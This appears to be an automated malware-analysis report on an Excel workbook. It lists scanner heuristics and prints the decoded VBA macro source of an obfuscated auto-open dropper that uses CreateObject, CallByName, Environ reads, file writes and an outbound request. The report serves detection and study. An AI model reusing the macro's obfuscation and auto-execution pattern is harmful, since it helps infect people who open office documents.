Verdict: MALICIOUS

Risk Score: 158

Heuristics (7)
- VBA macros detected (medium; 5 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script: `Set zdit = CreateObject(p)`
- CallByName call (high) [OLE_VBA_CALLBYNAME]: CallByName call. Matched line in script: `Set a = CallByName(zdit, ppwfzxtalv(0), VbMethod, ppwfzxtalv(1), "")`
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low) [OLE_VBA_WBOPEN]: Workbook_Open macro. Matched line in script: `Private Sub Workbook_Open()`
- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access). Matched line in script: `If Len(Environ(ppwfzxtalv(29))) > 0 Then`
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs found in document text (OLE body):
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: aeb7ec78105804e0a2f407107e9897c067cb5c320549f6cf2f68699cc87f2a3d) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4099 bytes |
Preview of extracted script (first 1,000 lines):

```vb
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "T, 281, 1, MSForms, TextBox"
Public zdit As Object
Function hwqincirqo() As String
On Error GoTo p:
Set a = CallByName(zdit, ppwfzxtalv(0), VbMethod, ppwfzxtalv(1), "")
x = CallByName(a, ppwfzxtalv(2), VbGet)
x = x & ppwfzxtalv(3) & CallByName(a, ppwfzxtalv(4), VbGet)
x = x & ppwfzxtalv(3) & CallByName(a, ppwfzxtalv(6), VbGet)
x = x & ppwfzxtalv(3) & CallByName(Application, ppwfzxtalv(8), VbGet)
hwqincirqo = x
Exit Function
p:
MsgBox ppwfzxtalv(9), vbCritical, ppwfzxtalv(10)
End Function
Function jbrulhvcvl()
On Error GoTo g:
Set a = CallByName(zdit, ppwfzxtalv(0), VbMethod, ppwfzxtalv(12), "")
x = ppwfzxtalv(13)
p = ppwfzxtalv(14) & CallByName(Application, ppwfzxtalv(15), VbGet) & ppwfzxtalv(16)
CallByName a, ppwfzxtalv(17), VbMethod, p & ppwfzxtalv(18), 1, x
CallByName a, ppwfzxtalv(17), VbMethod, p & ppwfzxtalv(20), 1, x
CallByName a, ppwfzxtalv(17), VbMethod, p & ppwfzxtalv(22), 1, x
CallByName a, ppwfzxtalv(17), VbMethod, p & ppwfzxtalv(24), 1, x
CallByName a, ppwfzxtalv(17), VbMethod, p & ppwfzxtalv(26), 1, x
Set v = CallByName(zdit, ppwfzxtalv(0), VbMethod, ppwfzxtalv(28), "")
If Len(Environ(ppwfzxtalv(29))) > 0 Then
CallByName v, ppwfzxtalv(30), VbMethod, ppwfzxtalv(31), Environ(ppwfzxtalv(32)) & ppwfzxtalv(33)
Else
CallByName v, ppwfzxtalv(30), VbMethod, ppwfzxtalv(35), Environ(ppwfzxtalv(32)) & ppwfzxtalv(33)
End If
CallByName a, ppwfzxtalv(17), VbMethod, ppwfzxtalv(39), Environ(ppwfzxtalv(32)) & ppwfzxtalv(41) & Environ(ppwfzxtalv(32)) & ppwfzxtalv(43), ppwfzxtalv(44)
Open Environ(ppwfzxtalv(32)) & ppwfzxtalv(43) For Output As #1
Print #1, qebkwmdhsn(CallByName(F, ppwfzxtalv(47), VbGet))
Close #1
Exit Function
g:
MsgBox ppwfzxtalv(9), vbCritical, ppwfzxtalv(10)
End Function
Function qebkwmdhsn(b As String) As String
On Error GoTo a:
x = T.Text & ThisWorkbook.Name
p = ""
v = 0
For g = 1 To Len(b) Step 4
k = Asc(Mid(x, (v Mod Len(x) + 1), 1))
j = Left(b, 4)
j = j Xor 9
j = j - k
b = Right(b, Len(b) - 4)
v = v + 1
p = p + Chr(j Xor k)
Next g
qebkwmdhsn = p
Exit Function
a:
MsgBox ppwfzxtalv(9), vbCritical, ppwfzxtalv(10)
End Function
Function wvzmlrfmqu()
On Error GoTo x:
Dim p As String
p = ppwfzxtalv(52)
Set zdit = CreateObject(p)
jbrulhvcvl
Dim a As Object
Set a = CallByName(zdit, ppwfzxtalv(0), VbMethod, ppwfzxtalv(54), "")
CallByName a, ppwfzxtalv(55), VbMethod, ppwfzxtalv(56), ppwfzxtalv(57) & hwqincirqo, False
CallByName a, ppwfzxtalv(58), VbMethod, ""
CallByName a, ppwfzxtalv(59), VbMethod
Exit Function
x:
MsgBox ppwfzxtalv(9), vbCritical, ppwfzxtalv(10)
End Function
Function ppwfzxtalv(a) As String
x = Split(F.T.Text, ".")
Dim p As String
p = x(a)
ppwfzxtalv = qebkwmdhsn(p)
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Sheet1.wvzmlrfmqu
End Sub
Attribute VB_Name = "F"
Attribute VB_Base = "0{91EC92EB-9F4D-4A5A-A1D0-3367C1AB6250}{37247A1D-4E60-4A89-88F4-BED303B46CB5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```